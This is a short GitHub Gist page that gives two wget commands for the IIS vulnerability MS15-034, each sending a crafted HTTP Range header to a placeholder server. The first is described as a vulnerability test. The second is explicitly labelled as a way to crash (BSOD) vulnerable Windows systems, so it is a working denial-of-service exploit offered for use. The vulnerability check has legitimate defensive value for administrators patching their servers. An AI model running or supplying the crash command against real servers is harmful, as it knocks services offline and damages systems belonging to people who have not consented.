Created
April 16, 2015 01:48
-
-
Save jgamblin/78385829c9922b4b465d to your computer and use it in GitHub Desktop.
Test for MS15-034 with WGET
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Use this just to test (Requested Range Not Satisfiable = vulnerable): | |
wget --header="Range: bytes=0-18446744073709551615" http://serveraddress/iis-85.png | |
#Use this to BSOD Vulnerable systems: | |
wget --header="Range: bytes=18-18446744073709551615" http://serveraddress/iis-85.png |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment